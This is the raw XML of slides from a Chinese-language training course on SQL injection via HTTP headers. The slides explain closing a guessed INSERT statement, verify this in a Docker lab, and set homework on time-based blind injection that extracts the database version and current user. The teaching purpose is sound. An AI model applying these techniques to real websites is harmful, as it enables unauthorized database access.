                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D4999"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>注入的不同类型</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="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76E8A090-41A8-5F4D-94BE-7E081B07E5DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D49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626A29F-90EF-2F45-AC22-0DBA4EC90C74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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46802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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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F923B1E3-3655-BE46-A7BB-112AED222B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4272424" y="1581288"/>
            <a:ext cx="3371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直接闭合可以吗？我们来试一试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="社交网站的手机截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E186A6D8-2289-1746-8016-6B43DE4B0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09544"/>
            <a:ext cx="12192000" cy="3059991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06FB03F2-2D96-B742-A280-7D58D2B87C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="166446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kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>核心是什么？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>推测后端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句的形态，尝试闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-C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1672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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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06FB03F2-2D96-B742-A280-7D58D2B87C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484682" y="1219486"/>
            <a:ext cx="7624997" cy="1299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回忆一下我们上一堂课程讲的内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"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核心是什么？</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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推测后端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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语句的形态，尝试闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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语句。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="手机屏幕截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270A4C71-CAEC-FC4D-88F2-3A3CECB594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8525" y="2519457"/>
            <a:ext cx="7854950" cy="411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4940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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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 descr="手机屏幕截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270A4C71-CAEC-FC4D-88F2-3A3CECB594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415" y="2616580"/>
            <a:ext cx="7854950" cy="411943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0EAF947-6114-7B47-AE30-343077A249EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8218365" y="2616580"/>
            <a:ext cx="378982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accent2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我们猜测后端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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语句形态：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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  <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"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  <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1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xxx,yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"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  <a:p>
            <a:r>
              <a:rPr kumimoji="1"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让我们进入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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验证一下吧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14A00FD-A552-C447-9C5C-ECF7DDAFE219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484682" y="1219486"/>
            <a:ext cx="7624997" cy="12999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回忆一下我们上一堂课程讲的内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"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核心是什么？</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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推测后端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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语句的形态，尝试闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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语句。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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940310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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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 descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE33BE9-F14C-AF48-88CD-0F2FA3CDE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30965"/>
            <a:ext cx="12192000" cy="400467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4C18BCC-2B29-FE4E-AED7-AC3C8E89AFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651006" y="597490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BINGO!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72367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54C6A-2360-E048-97AF-936385A0C9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3414" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="x-none" sz="32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课后作业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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03BD0F8A-7223-6D4F-BDE2-67DD467D28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10" t="756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="5766697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862718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="5791057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BE843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="216412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6990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349808" y="3726425"/>
            <a:ext cx="3100612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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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LET’S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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4F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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5E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5088636" y="2967798"/>
            <a:ext cx="6400999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indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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练习，尝试用脚本获取数据库版本信息以及当前用户账户；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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盲注完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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头注入；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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尝试适用两种及以上不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty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函数完成盲注练习。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4276628" y="2961649"/>
            <a:ext cx="406648" cy="406648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 519 w 719"/>
              <a:gd name="T1" fmla="*/ 263 h 719"/>
              <a:gd name="T2" fmla="*/ 292 w 719"/>
              <a:gd name="T3" fmla="*/ 475 h 719"/>
              <a:gd name="T4" fmla="*/ 289 w 719"/>
              <a:gd name="T5" fmla="*/ 477 h 719"/>
              <a:gd name="T6" fmla="*/ 284 w 719"/>
              <a:gd name="T7" fmla="*/ 479 h 719"/>
              <a:gd name="T8" fmla="*/ 280 w 719"/>
              <a:gd name="T9" fmla="*/ 477 h 719"/>
              <a:gd name="T10" fmla="*/ 275 w 719"/>
              <a:gd name="T11" fmla="*/ 475 h 719"/>
              <a:gd name="T12" fmla="*/ 200 w 719"/>
              <a:gd name="T13" fmla="*/ 400 h 719"/>
              <a:gd name="T14" fmla="*/ 198 w 719"/>
              <a:gd name="T15" fmla="*/ 396 h 719"/>
              <a:gd name="T16" fmla="*/ 197 w 719"/>
              <a:gd name="T17" fmla="*/ 391 h 719"/>
              <a:gd name="T18" fmla="*/ 198 w 719"/>
              <a:gd name="T19" fmla="*/ 387 h 719"/>
              <a:gd name="T20" fmla="*/ 200 w 719"/>
              <a:gd name="T21" fmla="*/ 382 h 719"/>
              <a:gd name="T22" fmla="*/ 205 w 719"/>
              <a:gd name="T23" fmla="*/ 380 h 719"/>
              <a:gd name="T24" fmla="*/ 209 w 719"/>
              <a:gd name="T25" fmla="*/ 379 h 719"/>
              <a:gd name="T26" fmla="*/ 213 w 719"/>
              <a:gd name="T27" fmla="*/ 380 h 719"/>
              <a:gd name="T28" fmla="*/ 217 w 719"/>
              <a:gd name="T29" fmla="*/ 382 h 719"/>
              <a:gd name="T30" fmla="*/ 284 w 719"/>
              <a:gd name="T31" fmla="*/ 450 h 719"/>
              <a:gd name="T32" fmla="*/ 503 w 719"/>
              <a:gd name="T33" fmla="*/ 247 h 719"/>
              <a:gd name="T34" fmla="*/ 507 w 719"/>
              <a:gd name="T35" fmla="*/ 243 h 719"/>
              <a:gd name="T36" fmla="*/ 512 w 719"/>
              <a:gd name="T37" fmla="*/ 243 h 719"/>
              <a:gd name="T38" fmla="*/ 516 w 719"/>
              <a:gd name="T39" fmla="*/ 243 h 719"/>
              <a:gd name="T40" fmla="*/ 519 w 719"/>
              <a:gd name="T41" fmla="*/ 247 h 719"/>
              <a:gd name="T42" fmla="*/ 522 w 719"/>
              <a:gd name="T43" fmla="*/ 251 h 719"/>
              <a:gd name="T44" fmla="*/ 523 w 719"/>
              <a:gd name="T45" fmla="*/ 255 h 719"/>
              <a:gd name="T46" fmla="*/ 522 w 719"/>
              <a:gd name="T47" fmla="*/ 260 h 719"/>
              <a:gd name="T48" fmla="*/ 519 w 719"/>
              <a:gd name="T49" fmla="*/ 263 h 719"/>
              <a:gd name="T50" fmla="*/ 707 w 719"/>
              <a:gd name="T51" fmla="*/ 0 h 719"/>
              <a:gd name="T52" fmla="*/ 12 w 719"/>
              <a:gd name="T53" fmla="*/ 0 h 719"/>
              <a:gd name="T54" fmla="*/ 8 w 719"/>
              <a:gd name="T55" fmla="*/ 2 h 719"/>
              <a:gd name="T56" fmla="*/ 4 w 719"/>
              <a:gd name="T57" fmla="*/ 5 h 719"/>
              <a:gd name="T58" fmla="*/ 1 w 719"/>
              <a:gd name="T59" fmla="*/ 8 h 719"/>
              <a:gd name="T60" fmla="*/ 0 w 719"/>
              <a:gd name="T61" fmla="*/ 13 h 719"/>
              <a:gd name="T62" fmla="*/ 0 w 719"/>
              <a:gd name="T63" fmla="*/ 707 h 719"/>
              <a:gd name="T64" fmla="*/ 1 w 719"/>
              <a:gd name="T65" fmla="*/ 713 h 719"/>
              <a:gd name="T66" fmla="*/ 4 w 719"/>
              <a:gd name="T67" fmla="*/ 716 h 719"/>
              <a:gd name="T68" fmla="*/ 8 w 719"/>
              <a:gd name="T69" fmla="*/ 719 h 719"/>
              <a:gd name="T70" fmla="*/ 12 w 719"/>
              <a:gd name="T71" fmla="*/ 719 h 719"/>
              <a:gd name="T72" fmla="*/ 707 w 719"/>
              <a:gd name="T73" fmla="*/ 719 h 719"/>
              <a:gd name="T74" fmla="*/ 711 w 719"/>
              <a:gd name="T75" fmla="*/ 719 h 719"/>
              <a:gd name="T76" fmla="*/ 716 w 719"/>
              <a:gd name="T77" fmla="*/ 716 h 719"/>
              <a:gd name="T78" fmla="*/ 718 w 719"/>
              <a:gd name="T79" fmla="*/ 713 h 719"/>
              <a:gd name="T80" fmla="*/ 719 w 719"/>
              <a:gd name="T81" fmla="*/ 707 h 719"/>
              <a:gd name="T82" fmla="*/ 719 w 719"/>
              <a:gd name="T83" fmla="*/ 13 h 719"/>
              <a:gd name="T84" fmla="*/ 718 w 719"/>
              <a:gd name="T85" fmla="*/ 8 h 719"/>
              <a:gd name="T86" fmla="*/ 716 w 719"/>
              <a:gd name="T87" fmla="*/ 5 h 719"/>
              <a:gd name="T88" fmla="*/ 711 w 719"/>
              <a:gd name="T89" fmla="*/ 2 h 719"/>
              <a:gd name="T90" fmla="*/ 707 w 719"/>
              <a:gd name="T91" fmla="*/ 0 h 7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719" h="719">
                <a:moveTo>
                  <a:pt x="519" y="263"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523" y="255"/>
                </a:lnTo>
                <a:lnTo>
